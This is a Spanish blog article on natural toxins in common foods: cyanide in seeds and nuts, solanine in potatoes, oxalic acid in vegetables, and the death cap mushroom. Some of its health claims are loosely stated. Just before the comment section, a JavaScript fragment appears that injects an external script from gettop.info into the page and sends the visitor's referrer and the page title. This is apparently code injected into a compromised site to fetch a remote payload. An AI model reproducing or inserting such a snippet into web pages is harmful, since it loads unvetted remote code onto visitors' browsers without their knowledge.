Salud y belleza » Productos peligrosos, Salud, alimentos

Los venenos que comemos a diario sin saberlo

Sin Comentarios

A diario consumimos muchos elementos tóxicos sin darnos cuenta, aunque en una cantidad que no llega a ser demasiado perjudicial para nuestro organismo pero que si llegamos a consumir en exceso puede convertirse en un veneno. Hoy vamos a hablarte de todos esos venenos que comemos a diario sin darnos cuenta:

alimentos-con-veneno

- Cianuro: este veneno es potencialmente letal y tiene un olor muy fuerte como a castañas o a almendras amargas. Es un veneno que se puede encontrar en almendras, nueces o castañas, además de en las pepitas de frutas, manzanas, peras, melocotones o ciruelas. Solo es peligroso en dosis muy elevadas y estas son casi imposibles de cumplir. Los síntomas de este veneno son el bloqueo del proceso de respiración celular, lo que podría llevar a un paro cardíaco.

alimentos-cianuro

- Alcaloides tóxicos y solanina: es un veneno que podemos encontrar en las hijas, frutos y tubérculos de algunas plantas, como la berenjena, el tomate o la patata. El veneno en bajas dosis no es peligrosos pero ésta puede aumentar si se expone a la luz o a la claridad, por eso se recomienda alejar las patatas de la claridad. Los síntomas de este veneno son la irritación gastrointestinal además de efectos nocivos sobre el sistema nervioso.

alcaloides-tóxicos-patatas

- Ácido Oxálico: las verduras son muy sanas, pero también pueden contener venenos como este, el ácido oxálico. Es una sustancia corrosiva que se usa en quitamanchas o para abrillantar metales. Un veneno real que está presente en muchos alimentos como las acelgas, espinacas, remolacha, té o el deseado chocolate. Aunque para coger una intoxicación se deben comer unos 5 kilos de verduras.

acido-oxalico-alimentos

- Amanita phalloides: las setas son uno de los alimentos más peligrosos, aunque de las más de 1.000 especies que conocemos en España solo unas 100 son tóxicas. La mayoría de intoxicaciones se deben a la Amanita phalloides que podría ser letal si se consume un solo ejemplar de 50 gramos, por ejemplo.

amanita-phalloides-setas

¿Conocías todos los venenos que consumes a diario?

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; d.getElementsByTagName('head')[0].appendChild(s);

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.